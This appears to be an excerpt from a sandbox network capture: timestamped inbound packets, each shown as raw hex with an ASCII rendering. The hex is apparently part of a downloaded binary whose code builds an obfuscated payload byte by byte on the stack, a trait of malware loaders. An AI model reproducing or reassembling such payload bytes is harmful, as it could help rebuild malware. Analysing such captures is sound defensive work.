2022-05-16 08:29:53 UTC	4381	IN	Data Raw: fa b7 fc ff cd c6 85 fb b7 fc ff c6 c6 85 fc b7 fc ff cd c6 85 fd b7 fc ff 13 c6 85 fe b7 fc ff fe c6 85 ff b7 fc ff ee c6 85 00 b8 fc ff 84 c6 85 01 b8 fc ff f8 c6 85 02 b8 fc ff 6c c6 85 03 b8 fc ff 4f c6 85 04 b8 fc ff 6b c6 85 05 b8 fc ff f7 c6 85 06 b8 fc ff da c6 85 07 b8 fc ff 96 c6 85 08 b8 fc ff 5e c6 85 09 b8 fc ff 81 c6 85 0a b8 fc ff fb c6 85 0b b8 fc ff 8c c6 85 0c b8 fc ff 28 c6 85 0d b8 fc ff e8 c6 85 0e b8 fc ff c2 c6 85 0f b8 fc ff 6f c6 85 10 b8 fc ff 5a c6 85 11 b8 fc ff d4 c6 85 12 b8 fc ff 5a c6 85 13 b8 fc ff 33 c6 85 14 b8 fc ff 01 c6 85 15 b8 fc ff 76 c6 85 16 b8 fc ff 97 c6 85 17 b8 fc ff 55 c6 85 18 b8 fc ff 8b c6 85 19 b8 fc ff 6d c6 85 1a b8 fc ff 1a c6 85 1b b8 fc ff 07 c6 85 1c b8 fc ff bd c6 85 1d b8 fc ff 39 c6 85 1e b8 fc Data Ascii: lOk^(oZZ3vUm9
2022-05-16 08:29:53 UTC	4397	IN	Data Raw: c2 c6 85 1f c1 fc ff 74 c6 85 20 c1 fc ff 85 c6 85 21 c1 fc ff ea c6 85 22 c1 fc ff a1 c6 85 23 c1 fc ff 44 c6 85 24 c1 fc ff 38 c6 85 25 c1 fc ff 36 c6 85 26 c1 fc ff b9 c6 85 27 c1 fc ff 82 c6 85 28 c1 fc ff a2 c6 85 29 c1 fc ff 0f c6 85 2a c1 fc ff 13 c6 85 2b c1 fc ff a9 c6 85 2c c1 fc ff 63 c6 85 2d c1 fc ff 68 c6 85 2e c1 fc ff 45 c6 85 2f c1 fc ff ff c6 85 30 c1 fc ff 11 c6 85 31 c1 fc ff d2 c6 85 32 c1 fc ff c8 c6 85 33 c1 fc ff 9e c6 85 34 c1 fc ff 9f c6 85 35 c1 fc ff c3 c6 85 36 c1 fc ff f1 c6 85 37 c1 fc ff 2a c6 85 38 c1 fc ff 70 c6 85 39 c1 fc ff 0f c6 85 3a c1 fc ff 76 c6 85 3b c1 fc ff a3 c6 85 3c c1 fc ff c6 c6 85 3d c1 fc ff e1 c6 85 3e c1 fc ff ac c6 85 3f c1 fc ff f9 c6 85 40 c1 fc ff 4d c6 85 41 c1 fc ff 09 c6 85 42 c1 fc ff 32 c6 85 Data Ascii: t !"#D$8%6&'()+,c-h.E/012345678p9:v;<=>?@MAB2
2022-05-16 08:29:53 UTC	4413	IN	Data Raw: ca fc ff 9b c6 85 44 ca fc ff cf c6 85 45 ca fc ff a8 c6 85 46 ca fc ff 78 c6 85 47 ca fc ff 90 c6 85 48 ca fc ff bf c6 85 49 ca fc ff e9 c6 85 4a ca fc ff cc c6 85 4b ca fc ff 23 c6 85 4c ca fc ff a0 c6 85 4d ca fc ff 90 c6 85 4e ca fc ff 5b c6 85 4f ca fc ff ad c6 85 50 ca fc ff 40 c6 85 51 ca fc ff ec c6 85 52 ca fc ff 7a c6 85 53 ca fc ff 85 c6 85 54 ca fc ff 24 c6 85 55 ca fc ff 76 c6 85 56 ca fc ff c1 c6 85 57 ca fc ff 23 c6 85 58 ca fc ff 3e c6 85 59 ca fc ff 92 c6 85 5a ca fc ff 82 c6 85 5b ca fc ff a7 c6 85 5c ca fc ff a9 c6 85 5d ca fc ff c2 c6 85 5e ca fc ff 26 c6 85 5f ca fc ff e9 c6 85 60 ca fc ff 7a c6 85 61 ca fc ff a8 c6 85 62 ca fc ff d1 c6 85 63 ca fc ff 64 c6 85 64 ca fc ff 0b c6 85 65 ca fc ff b0 c6 85 66 ca fc ff 43 c6 85 67 ca fc ff Data Ascii: DEFxGHIJK#LMN[OP@QRzST$UvVW#X>YZ[\]^&_`zabcddefCg
2022-05-16 08:29:53 UTC	4429	IN	Data Raw: c6 85 68 d3 fc ff e3 c6 85 69 d3 fc ff 12 c6 85 6a d3 fc ff 3d c6 85 6b d3 fc ff 29 c6 85 6c d3 fc ff a0 c6 85 6d d3 fc ff 8f c6 85 6e d3 fc ff 4e c6 85 6f d3 fc ff 1c c6 85 70 d3 fc ff 78 c6 85 71 d3 fc ff 7b c6 85 72 d3 fc ff 1a c6 85 73 d3 fc ff b4 c6 85 74 d3 fc ff df c6 85 75 d3 fc ff 39 c6 85 76 d3 fc ff 98 c6 85 77 d3 fc ff 9d c6 85 78 d3 fc ff 2a c6 85 79 d3 fc ff c1 c6 85 7a d3 fc ff 09 c6 85 7b d3 fc ff f9 c6 85 7c d3 fc ff 86 c6 85 7d d3 fc ff c5 c6 85 7e d3 fc ff a0 c6 85 7f d3 fc ff 71 c6 85 80 d3 fc ff d1 c6 85 81 d3 fc ff 57 c6 85 82 d3 fc ff 55 c6 85 83 d3 fc ff fd c6 85 84 d3 fc ff 63 c6 85 85 d3 fc ff 8a c6 85 86 d3 fc ff 7c c6 85 87 d3 fc ff 23 c6 85 88 d3 fc ff 1d c6 85 89 d3 fc ff 63 c6 85 8a d3 fc ff 67 c6 85 8b d3 fc ff 71 c6 85 8c Data Ascii: hij=k)lmnNopxq{rstu9vwx*yz{\|}~qWUc\|#cgq
2022-05-16 08:29:53 UTC	4445	IN	Data Raw: fc ff 64 c6 85 8d dc fc ff 4e c6 85 8e dc fc ff 99 c6 85 8f dc fc ff 53 c6 85 90 dc fc ff f8 c6 85 91 dc fc ff ce c6 85 92 dc fc ff 33 c6 85 93 dc fc ff df c6 85 94 dc fc ff c2 c6 85 95 dc fc ff 79 c6 85 96 dc fc ff af c6 85 97 dc fc ff 9b c6 85 98 dc fc ff 08 c6 85 99 dc fc ff 58 c6 85 9a dc fc ff fa c6 85 9b dc fc ff ca c6 85 9c dc fc ff 68 c6 85 9d dc fc ff b0 c6 85 9e dc fc ff 12 c6 85 9f dc fc ff 93 c6 85 a0 dc fc ff 03 c6 85 a1 dc fc ff 30 c6 85 a2 dc fc ff 68 c6 85 a3 dc fc ff 10 c6 85 a4 dc fc ff 16 c6 85 a5 dc fc ff 42 c6 85 a6 dc fc ff 34 c6 85 a7 dc fc ff 20 c6 85 a8 dc fc ff 8f c6 85 a9 dc fc ff ca c6 85 aa dc fc ff cc c6 85 ab dc fc ff 27 c6 85 ac dc fc ff f5 c6 85 ad dc fc ff ec c6 85 ae dc fc ff 5a c6 85 af dc fc ff b0 c6 85 b0 dc fc ff de Data Ascii: dNS3yXh0hB4 'Z
2022-05-16 08:29:53 UTC	4461	IN	Data Raw: 85 b1 e5 fc ff 3e c6 85 b2 e5 fc ff fe c6 85 b3 e5 fc ff e8 c6 85 b4 e5 fc ff c1 c6 85 b5 e5 fc ff 32 c6 85 b6 e5 fc ff 58 c6 85 b7 e5 fc ff b1 c6 85 b8 e5 fc ff b1 c6 85 b9 e5 fc ff 04 c6 85 ba e5 fc ff f1 c6 85 bb e5 fc ff e5 c6 85 bc e5 fc ff a3 c6 85 bd e5 fc ff 98 c6 85 be e5 fc ff f5 c6 85 bf e5 fc ff 98 c6 85 c0 e5 fc ff ef c6 85 c1 e5 fc ff 1d c6 85 c2 e5 fc ff c2 c6 85 c3 e5 fc ff 2a c6 85 c4 e5 fc ff a9 c6 85 c5 e5 fc ff c2 c6 85 c6 e5 fc ff cc c6 85 c7 e5 fc ff 47 c6 85 c8 e5 fc ff a8 c6 85 c9 e5 fc ff 71 c6 85 ca e5 fc ff 86 c6 85 cb e5 fc ff 63 c6 85 cc e5 fc ff 43 c6 85 cd e5 fc ff 6c c6 85 ce e5 fc ff 44 c6 85 cf e5 fc ff 23 c6 85 d0 e5 fc ff 54 c6 85 d1 e5 fc ff 07 c6 85 d2 e5 fc ff dc c6 85 d3 e5 fc ff be c6 85 d4 e5 fc ff b2 c6 85 d5 e5 Data Ascii: >2X*GqcClD#T
2022-05-16 08:29:53 UTC	4477	IN	Data Raw: ff 8b c6 85 d6 ee fc ff 9f c6 85 d7 ee fc ff 05 c6 85 d8 ee fc ff e9 c6 85 d9 ee fc ff 7b c6 85 da ee fc ff 82 c6 85 db ee fc ff 23 c6 85 dc ee fc ff 72 c6 85 dd ee fc ff a0 c6 85 de ee fc ff b5 c6 85 df ee fc ff 88 c6 85 e0 ee fc ff 2f c6 85 e1 ee fc ff 39 c6 85 e2 ee fc ff 5a c6 85 e3 ee fc ff 9b c6 85 e4 ee fc ff 76 c6 85 e5 ee fc ff 01 c6 85 e6 ee fc ff f7 c6 85 e7 ee fc ff dc c6 85 e8 ee fc ff d6 c6 85 e9 ee fc ff 68 c6 85 ea ee fc ff f5 c6 85 eb ee fc ff cf c6 85 ec ee fc ff 86 c6 85 ed ee fc ff a2 c6 85 ee ee fc ff 66 c6 85 ef ee fc ff a1 c6 85 f0 ee fc ff 98 c6 85 f1 ee fc ff 81 c6 85 f2 ee fc ff 98 c6 85 f3 ee fc ff 36 c6 85 f4 ee fc ff 79 c6 85 f5 ee fc ff f0 c6 85 f6 ee fc ff b0 c6 85 f7 ee fc ff 48 c6 85 f8 ee fc ff 4b c6 85 f9 ee fc ff ce c6 Data Ascii: {#r/9Zvhf6yHK
2022-05-16 08:29:53 UTC	4493	IN	Data Raw: fa f7 fc ff 15 c6 85 fb f7 fc ff 2c c6 85 fc f7 fc ff 54 c6 85 fd f7 fc ff 49 c6 85 fe f7 fc ff ca c6 85 ff f7 fc ff dd c6 85 00 f8 fc ff 78 c6 85 01 f8 fc ff 71 c6 85 02 f8 fc ff 60 c6 85 03 f8 fc ff 01 c6 85 04 f8 fc ff 8d c6 85 05 f8 fc ff a8 c6 85 06 f8 fc ff e3 c6 85 07 f8 fc ff 24 c6 85 08 f8 fc ff 55 c6 85 09 f8 fc ff b3 c6 85 0a f8 fc ff d4 c6 85 0b f8 fc ff b9 c6 85 0c f8 fc ff 31 c6 85 0d f8 fc ff 91 c6 85 0e f8 fc ff 0a c6 85 0f f8 fc ff e9 c6 85 10 f8 fc ff 81 c6 85 11 f8 fc ff 7b c6 85 12 f8 fc ff 92 c6 85 13 f8 fc ff d7 c6 85 14 f8 fc ff 9a c6 85 15 f8 fc ff 1f c6 85 16 f8 fc ff 05 c6 85 17 f8 fc ff 26 c6 85 18 f8 fc ff 1f c6 85 19 f8 fc ff 41 c6 85 1a f8 fc ff ab c6 85 1b f8 fc ff 75 c6 85 1c f8 fc ff 06 c6 85 1d f8 fc ff a1 c6 85 1e f8 fc Data Ascii: ,TIxq`$U1{&Au
2022-05-16 08:29:53 UTC	4509	IN	Data Raw: 91 c6 85 1f 01 fd ff d0 c6 85 20 01 fd ff f9 c6 85 21 01 fd ff 46 c6 85 22 01 fd ff 00 c6 85 23 01 fd ff 78 c6 85 24 01 fd ff 6c c6 85 25 01 fd ff 4f c6 85 26 01 fd ff 23 c6 85 27 01 fd ff 96 c6 85 28 01 fd ff 6f c6 85 29 01 fd ff 8c c6 85 2a 01 fd ff 67 c6 85 2b 01 fd ff 3a c6 85 2c 01 fd ff 34 c6 85 2d 01 fd ff 0f c6 85 2e 01 fd ff 61 c6 85 2f 01 fd ff 2b c6 85 30 01 fd ff cb c6 85 31 01 fd ff 07 c6 85 32 01 fd ff fe c6 85 33 01 fd ff ac c6 85 34 01 fd ff b2 c6 85 35 01 fd ff 3a c6 85 36 01 fd ff f9 c6 85 37 01 fd ff d9 c6 85 38 01 fd ff 7c c6 85 39 01 fd ff 12 c6 85 3a 01 fd ff b6 c6 85 3b 01 fd ff a5 c6 85 3c 01 fd ff 1a c6 85 3d 01 fd ff a7 c6 85 3e 01 fd ff f5 c6 85 3f 01 fd ff b2 c6 85 40 01 fd ff c9 c6 85 41 01 fd ff e9 c6 85 42 01 fd ff 3a c6 85 Data Ascii: !F"#x$l%O&#'(o)*g+:,4-.a/+012345:678\|9:;<=>?@AB:
2022-05-16 08:29:53 UTC	4525	IN	Data Raw: 0a fd ff 63 c6 85 44 0a fd ff 6c c6 85 45 0a fd ff df c6 85 46 0a fd ff be c6 85 47 0a fd ff 12 c6 85 48 0a fd ff 49 c6 85 49 0a fd ff cb c6 85 4a 0a fd ff 29 c6 85 4b 0a fd ff 8a c6 85 4c 0a fd ff 4b c6 85 4d 0a fd ff 26 c6 85 4e 0a fd ff 6e c6 85 4f 0a fd ff 55 c6 85 50 0a fd ff 04 c6 85 51 0a fd ff 74 c6 85 52 0a fd ff 94 c6 85 53 0a fd ff 82 c6 85 54 0a fd ff 43 c6 85 55 0a fd ff d6 c6 85 56 0a fd ff ef c6 85 57 0a fd ff 33 c6 85 58 0a fd ff 74 c6 85 59 0a fd ff af c6 85 5a 0a fd ff 68 c6 85 5b 0a fd ff 0d c6 85 5c 0a fd ff 9f c6 85 5d 0a fd ff c0 c6 85 5e 0a fd ff 89 c6 85 5f 0a fd ff 68 c6 85 60 0a fd ff 29 c6 85 61 0a fd ff 81 c6 85 62 0a fd ff c4 c6 85 63 0a fd ff 8d c6 85 64 0a fd ff 16 c6 85 65 0a fd ff fe c6 85 66 0a fd ff 11 c6 85 67 0a fd ff Data Ascii: cDlEFGHIIJ)KLKM&NnOUPQtRSTCUVW3XtYZh[\]^_h`)abcdefg
2022-05-16 08:29:53 UTC	4541	IN	Data Raw: c6 85 68 13 fd ff 25 c6 85 69 13 fd ff 9c c6 85 6a 13 fd ff 30 c6 85 6b 13 fd ff ac c6 85 6c 13 fd ff 14 c6 85 6d 13 fd ff 2f c6 85 6e 13 fd ff 29 c6 85 6f 13 fd ff 68 c6 85 70 13 fd ff 9f c6 85 71 13 fd ff 29 c6 85 72 13 fd ff fb c6 85 73 13 fd ff ed c6 85 74 13 fd ff 8d c6 85 75 13 fd ff c1 c6 85 76 13 fd ff 26 c6 85 77 13 fd ff 85 c6 85 78 13 fd ff 9c c6 85 79 13 fd ff 23 c6 85 7a 13 fd ff 33 c6 85 7b 13 fd ff 24 c6 85 7c 13 fd ff 38 c6 85 7d 13 fd ff ce c6 85 7e 13 fd ff ef c6 85 7f 13 fd ff cd c6 85 80 13 fd ff 67 c6 85 81 13 fd ff e8 c6 85 82 13 fd ff 56 c6 85 83 13 fd ff a7 c6 85 84 13 fd ff 90 c6 85 85 13 fd ff 75 c6 85 86 13 fd ff 26 c6 85 87 13 fd ff f8 c6 85 88 13 fd ff 39 c6 85 89 13 fd ff 0b c6 85 8a 13 fd ff 78 c6 85 8b 13 fd ff c6 c6 85 8c Data Ascii: h%ij0klm/n)ohpq)rstuv&wxy#z3{$\|8}~gVu&9x
2022-05-16 08:29:53 UTC	4557	IN	Data Raw: fd ff 7d c6 85 8d 1c fd ff 0d c6 85 8e 1c fd ff c0 c6 85 8f 1c fd ff f4 c6 85 90 1c fd ff 15 c6 85 91 1c fd ff 10 c6 85 92 1c fd ff d1 c6 85 93 1c fd ff 86 c6 85 94 1c fd ff 76 c6 85 95 1c fd ff 28 c6 85 96 1c fd ff 93 c6 85 97 1c fd ff 1d c6 85 98 1c fd ff 18 c6 85 99 1c fd ff 64 c6 85 9a 1c fd ff c4 c6 85 9b 1c fd ff 7a c6 85 9c 1c fd ff d2 c6 85 9d 1c fd ff ba c6 85 9e 1c fd ff ee c6 85 9f 1c fd ff 15 c6 85 a0 1c fd ff 2a c6 85 a1 1c fd ff b9 c6 85 a2 1c fd ff 39 c6 85 a3 1c fd ff 74 c6 85 a4 1c fd ff fc c6 85 a5 1c fd ff 8f c6 85 a6 1c fd ff b8 c6 85 a7 1c fd ff 3d c6 85 a8 1c fd ff ca c6 85 a9 1c fd ff e3 c6 85 aa 1c fd ff 98 c6 85 ab 1c fd ff 4b c6 85 ac 1c fd ff d8 c6 85 ad 1c fd ff a4 c6 85 ae 1c fd ff c2 c6 85 af 1c fd ff 8e c6 85 b0 1c fd ff 4b Data Ascii: }v(dz*9t=KK
2022-05-16 08:29:53 UTC	4573	IN	Data Raw: 85 b1 25 fd ff b8 c6 85 b2 25 fd ff 23 c6 85 b3 25 fd ff f1 c6 85 b4 25 fd ff c3 c6 85 b5 25 fd ff 13 c6 85 b6 25 fd ff 95 c6 85 b7 25 fd ff b2 c6 85 b8 25 fd ff 47 c6 85 b9 25 fd ff 98 c6 85 ba 25 fd ff 4c c6 85 bb 25 fd ff 5c c6 85 bc 25 fd ff fa c6 85 bd 25 fd ff c5 c6 85 be 25 fd ff de c6 85 bf 25 fd ff 38 c6 85 c0 25 fd ff 1a c6 85 c1 25 fd ff de c6 85 c2 25 fd ff 57 c6 85 c3 25 fd ff 6c c6 85 c4 25 fd ff ae c6 85 c5 25 fd ff 55 c6 85 c6 25 fd ff fe c6 85 c7 25 fd ff c4 c6 85 c8 25 fd ff 67 c6 85 c9 25 fd ff 69 c6 85 ca 25 fd ff 75 c6 85 cb 25 fd ff e0 c6 85 cc 25 fd ff 68 c6 85 cd 25 fd ff 6d c6 85 ce 25 fd ff 7e c6 85 cf 25 fd ff a1 c6 85 d0 25 fd ff 72 c6 85 d1 25 fd ff f8 c6 85 d2 25 fd ff da c6 85 d3 25 fd ff 20 c6 85 d4 25 fd ff df c6 85 d5 25 Data Ascii: %%#%%%%%%G%%L%\%%%%8%%%W%l%%U%%%g%i%u%%h%m%~%%r%%% %%
2022-05-16 08:29:53 UTC	4589	IN	Data Raw: ff af c6 85 d6 2e fd ff 89 c6 85 d7 2e fd ff da c6 85 d8 2e fd ff 94 c6 85 d9 2e fd ff 79 c6 85 da 2e fd ff 7d c6 85 db 2e fd ff c8 c6 85 dc 2e fd ff be c6 85 dd 2e fd ff 51 c6 85 de 2e fd ff 67 c6 85 df 2e fd ff ab c6 85 e0 2e fd ff 4d c6 85 e1 2e fd ff 44 c6 85 e2 2e fd ff ef c6 85 e3 2e fd ff 1f c6 85 e4 2e fd ff 0a c6 85 e5 2e fd ff 2a c6 85 e6 2e fd ff a1 c6 85 e7 2e fd ff 8e c6 85 e8 2e fd ff 4f c6 85 e9 2e fd ff ab c6 85 ea 2e fd ff d8 c6 85 eb 2e fd ff b2 c6 85 ec 2e fd ff 05 c6 85 ed 2e fd ff c7 c6 85 ee 2e fd ff 59 c6 85 ef 2e fd ff a3 c6 85 f0 2e fd ff ac c6 85 f1 2e fd ff 9e c6 85 f2 2e fd ff 60 c6 85 f3 2e fd ff 73 c6 85 f4 2e fd ff a7 c6 85 f5 2e fd ff d2 c6 85 f6 2e fd ff 39 c6 85 f7 2e fd ff 45 c6 85 f8 2e fd ff 76 c6 85 f9 2e fd ff 2b c6 Data Ascii: ....y.}...Q.g..M.D....*...O......Y....`.s...9.E.v.+
2022-05-16 08:29:53 UTC	4605	IN	Data Raw: fa 37 fd ff 85 c6 85 fb 37 fd ff 7d c6 85 fc 37 fd ff f9 c6 85 fd 37 fd ff f8 c6 85 fe 37 fd ff d2 c6 85 ff 37 fd ff 2b c6 85 00 38 fd ff 31 c6 85 01 38 fd ff ac c6 85 02 38 fd ff 09 c6 85 03 38 fd ff b9 c6 85 04 38 fd ff 5e c6 85 05 38 fd ff a7 c6 85 06 38 fd ff 33 c6 85 07 38 fd ff 0e c6 85 08 38 fd ff 41 c6 85 09 38 fd ff 5c c6 85 0a 38 fd ff bd c6 85 0b 38 fd ff 2c c6 85 0c 38 fd ff d1 c6 85 0d 38 fd ff 8f c6 85 0e 38 fd ff 4d c6 85 0f 38 fd ff e9 c6 85 10 38 fd ff f0 c6 85 11 38 fd ff 0e c6 85 12 38 fd ff a8 c6 85 13 38 fd ff cd c6 85 14 38 fd ff 13 c6 85 15 38 fd ff 7a c6 85 16 38 fd ff 15 c6 85 17 38 fd ff 35 c6 85 18 38 fd ff 33 c6 85 19 38 fd ff da c6 85 1a 38 fd ff 8f c6 85 1b 38 fd ff cc c6 85 1c 38 fd ff ae c6 85 1d 38 fd ff 5b c6 85 1e 38 fd Data Ascii: 77}7777+818888^88388A8\88,888M8888888z8858388888[8
2022-05-16 08:29:53 UTC	4621	IN	Data Raw: 70 c6 85 1f 41 fd ff fa c6 85 20 41 fd ff 30 c6 85 21 41 fd ff fc c6 85 22 41 fd ff d8 c6 85 23 41 fd ff ce c6 85 24 41 fd ff e3 c6 85 25 41 fd ff fe c6 85 26 41 fd ff fb c6 85 27 41 fd ff a8 c6 85 28 41 fd ff 60 c6 85 29 41 fd ff 3c c6 85 2a 41 fd ff fc c6 85 2b 41 fd ff 07 c6 85 2c 41 fd ff b8 c6 85 2d 41 fd ff c2 c6 85 2e 41 fd ff 7c c6 85 2f 41 fd ff b5 c6 85 30 41 fd ff 3a c6 85 31 41 fd ff 45 c6 85 32 41 fd ff f6 c6 85 33 41 fd ff 8a c6 85 34 41 fd ff 49 c6 85 35 41 fd ff 70 c6 85 36 41 fd ff d6 c6 85 37 41 fd ff 9c c6 85 38 41 fd ff c1 c6 85 39 41 fd ff 46 c6 85 3a 41 fd ff 57 c6 85 3b 41 fd ff 19 c6 85 3c 41 fd ff 43 c6 85 3d 41 fd ff e9 c6 85 3e 41 fd ff ce c6 85 3f 41 fd ff 6d c6 85 40 41 fd ff 71 c6 85 41 41 fd ff 12 c6 85 42 41 fd ff e4 c6 85 Data Ascii: pA A0!A"A#A$A%A&A'A(A`)A<*A+A,A-A.A\|/A0A:1AE2A3A4AI5Ap6A7A8A9AF:AW;A<AC=A>A?Am@AqAABA
2022-05-16 08:29:53 UTC	4637	IN	Data Raw: 4a fd ff 7a c6 85 44 4a fd ff 31 c6 85 45 4a fd ff f8 c6 85 46 4a fd ff 6c c6 85 47 4a fd ff c4 c6 85 48 4a fd ff 67 c6 85 49 4a fd ff 5a c6 85 4a 4a fd ff 97 c6 85 4b 4a fd ff 7f c6 85 4c 4a fd ff dc c6 85 4d 4a fd ff e1 c6 85 4e 4a fd ff d7 c6 85 4f 4a fd ff 27 c6 85 50 4a fd ff 6d c6 85 51 4a fd ff 84 c6 85 52 4a fd ff 47 c6 85 53 4a fd ff a8 c6 85 54 4a fd ff 32 c6 85 55 4a fd ff 88 c6 85 56 4a fd ff f2 c6 85 57 4a fd ff 11 c6 85 58 4a fd ff ba c6 85 59 4a fd ff 02 c6 85 5a 4a fd ff a9 c6 85 5b 4a fd ff d3 c6 85 5c 4a fd ff 79 c6 85 5d 4a fd ff 0d c6 85 5e 4a fd ff 7e c6 85 5f 4a fd ff a4 c6 85 60 4a fd ff 89 c6 85 61 4a fd ff 96 c6 85 62 4a fd ff c1 c6 85 63 4a fd ff 11 c6 85 64 4a fd ff ef c6 85 65 4a fd ff 53 c6 85 66 4a fd ff f2 c6 85 67 4a fd ff Data Ascii: JzDJ1EJFJlGJHJgIJZJJKJLJMJNJOJ'PJmQJRJGSJTJ2UJVJWJXJYJZJ[J\Jy]J^J~_J`JaJbJcJdJeJSfJgJ
2022-05-16 08:29:53 UTC	4653	IN	Data Raw: c6 85 68 53 fd ff 2e c6 85 69 53 fd ff c1 c6 85 6a 53 fd ff 61 c6 85 6b 53 fd ff 43 c6 85 6c 53 fd ff 6d c6 85 6d 53 fd ff ae c6 85 6e 53 fd ff 1b c6 85 6f 53 fd ff 13 c6 85 70 53 fd ff 6b c6 85 71 53 fd ff 68 c6 85 72 53 fd ff 0d c6 85 73 53 fd ff 76 c6 85 74 53 fd ff dc c6 85 75 53 fd ff a1 c6 85 76 53 fd ff 0a c6 85 77 53 fd ff 9e c6 85 78 53 fd ff d7 c6 85 79 53 fd ff 4c c6 85 7a 53 fd ff fe c6 85 7b 53 fd ff ab c6 85 7c 53 fd ff f8 c6 85 7d 53 fd ff 0d c6 85 7e 53 fd ff 76 c6 85 7f 53 fd ff a3 c6 85 80 53 fd ff 8e c6 85 81 53 fd ff 68 c6 85 82 53 fd ff 29 c6 85 83 53 fd ff c9 c6 85 84 53 fd ff 07 c6 85 85 53 fd ff ce c6 85 86 53 fd ff 76 c6 85 87 53 fd ff 2a c6 85 88 53 fd ff 40 c6 85 89 53 fd ff 2f c6 85 8a 53 fd ff fa c6 85 8b 53 fd ff 8e c6 85 8c Data Ascii: hS.iSjSakSClSmmSnSoSpSkqShrSsSvtSuSvSwSxSySLzS{S\|S}S~SvSSShS)SSSSvS*S@S/SS
2022-05-16 08:29:53 UTC	4669	IN	Data Raw: fd ff 73 c6 85 8d 5c fd ff a0 c6 85 8e 5c fd ff ab c6 85 8f 5c fd ff e0 c6 85 90 5c fd ff af c6 85 91 5c fd ff 4c c6 85 92 5c fd ff c8 c6 85 93 5c fd ff 6d c6 85 94 5c fd ff f9 c6 85 95 5c fd ff ed c6 85 96 5c fd ff 32 c6 85 97 5c fd ff 0e c6 85 98 5c fd ff 24 c6 85 99 5c fd ff 8a c6 85 9a 5c fd ff dd c6 85 9b 5c fd ff 67 c6 85 9c 5c fd ff b8 c6 85 9d 5c fd ff 60 c6 85 9e 5c fd ff eb c6 85 9f 5c fd ff ca c6 85 a0 5c fd ff a5 c6 85 a1 5c fd ff 46 c6 85 a2 5c fd ff 14 c6 85 a3 5c fd ff 88 c6 85 a4 5c fd ff f4 c6 85 a5 5c fd ff a7 c6 85 a6 5c fd ff 67 c6 85 a7 5c fd ff 31 c6 85 a8 5c fd ff 6c c6 85 a9 5c fd ff 73 c6 85 aa 5c fd ff ce c6 85 ab 5c fd ff 07 c6 85 ac 5c fd ff 85 c6 85 ad 5c fd ff 06 c6 85 ae 5c fd ff 20 c6 85 af 5c fd ff ac c6 85 b0 5c fd ff b6 Data Ascii: s\\\\\L\\m\\\2\\$\\\g\\`\\\\F\\\\\g\1\l\s\\\\\ \\
2022-05-16 08:29:53 UTC	4685	IN	Data Raw: 85 b1 65 fd ff f8 c6 85 b2 65 fd ff b8 c6 85 b3 65 fd ff 24 c6 85 b4 65 fd ff bd c6 85 b5 65 fd ff 7d c6 85 b6 65 fd ff 7a c6 85 b7 65 fd ff 8b c6 85 b8 65 fd ff 54 c6 85 b9 65 fd ff 75 c6 85 ba 65 fd ff 54 c6 85 bb 65 fd ff 08 c6 85 bc 65 fd ff c6 c6 85 bd 65 fd ff 76 c6 85 be 65 fd ff e6 c6 85 bf 65 fd ff 41 c6 85 c0 65 fd ff 10 c6 85 c1 65 fd ff a9 c6 85 c2 65 fd ff 0b c6 85 c3 65 fd ff 00 c6 85 c4 65 fd ff 38 c6 85 c5 65 fd ff 3c c6 85 c6 65 fd ff 71 c6 85 c7 65 fd ff 03 c6 85 c8 65 fd ff 15 c6 85 c9 65 fd ff c9 c6 85 ca 65 fd ff ee c6 85 cb 65 fd ff cb c6 85 cc 65 fd ff 97 c6 85 cd 65 fd ff 15 c6 85 ce 65 fd ff a0 c6 85 cf 65 fd ff 7e c6 85 d0 65 fd ff 78 c6 85 d1 65 fd ff 55 c6 85 d2 65 fd ff 2b c6 85 d3 65 fd ff 78 c6 85 d4 65 fd ff 21 c6 85 d5 65 Data Ascii: eee$ee}ezeeTeueTeeeveeAeeeee8e<eqeeeeeeeee~exeUe+exe!e
2022-05-16 08:29:53 UTC	4701	IN	Data Raw: ff 87 c6 85 d6 6e fd ff 74 c6 85 d7 6e fd ff 77 c6 85 d8 6e fd ff 56 c6 85 d9 6e fd ff f1 c6 85 da 6e fd ff 2b c6 85 db 6e fd ff bf c6 85 dc 6e fd ff 2a c6 85 dd 6e fd ff 5d c6 85 de 6e fd ff fa c6 85 df 6e fd ff ca c6 85 e0 6e fd ff e3 c6 85 e1 6e fd ff b4 c6 85 e2 6e fd ff bb c6 85 e3 6e fd ff 42 c6 85 e4 6e fd ff aa c6 85 e5 6e fd ff 6f c6 85 e6 6e fd ff 60 c6 85 e7 6e fd ff 58 c6 85 e8 6e fd ff 75 c6 85 e9 6e fd ff 41 c6 85 ea 6e fd ff 4c c6 85 eb 6e fd ff 47 c6 85 ec 6e fd ff 71 c6 85 ed 6e fd ff f9 c6 85 ee 6e fd ff 1e c6 85 ef 6e fd ff 27 c6 85 f0 6e fd ff f5 c6 85 f1 6e fd ff 24 c6 85 f2 6e fd ff fa c6 85 f3 6e fd ff 06 c6 85 f4 6e fd ff 89 c6 85 f5 6e fd ff fb c6 85 f6 6e fd ff aa c6 85 f7 6e fd ff b0 c6 85 f8 6e fd ff 03 c6 85 f9 6e fd ff 1a c6 Data Ascii: ntnwnVnn+nn*n]nnnnnnBnnon`nXnunAnLnGnqnnn'nn$nnnnnnnn
2022-05-16 08:29:53 UTC	4717	IN	Data Raw: fa 77 fd ff 98 c6 85 fb 77 fd ff 6e c6 85 fc 77 fd ff 0e c6 85 fd 77 fd ff 8a c6 85 fe 77 fd ff 75 c6 85 ff 77 fd ff a2 c6 85 00 78 fd ff eb c6 85 01 78 fd ff 70 c6 85 02 78 fd ff a9 c6 85 03 78 fd ff 55 c6 85 04 78 fd ff a7 c6 85 05 78 fd ff 94 c6 85 06 78 fd ff 05 c6 85 07 78 fd ff 4e c6 85 08 78 fd ff ad c6 85 09 78 fd ff c2 c6 85 0a 78 fd ff c2 c6 85 0b 78 fd ff a6 c6 85 0c 78 fd ff d0 c6 85 0d 78 fd ff 80 c6 85 0e 78 fd ff 0c c6 85 0f 78 fd ff 2f c6 85 10 78 fd ff ec c6 85 11 78 fd ff 28 c6 85 12 78 fd ff 2d c6 85 13 78 fd ff d6 c6 85 14 78 fd ff a3 c6 85 15 78 fd ff 74 c6 85 16 78 fd ff 07 c6 85 17 78 fd ff 66 c6 85 18 78 fd ff 38 c6 85 19 78 fd ff 41 c6 85 1a 78 fd ff 76 c6 85 1b 78 fd ff 63 c6 85 1c 78 fd ff 05 c6 85 1d 78 fd ff 96 c6 85 1e 78 fd Data Ascii: wwnwwwuwxxpxxUxxxxNxxxxxxxx/xx(x-xxxtxxfx8xAxvxcxxx
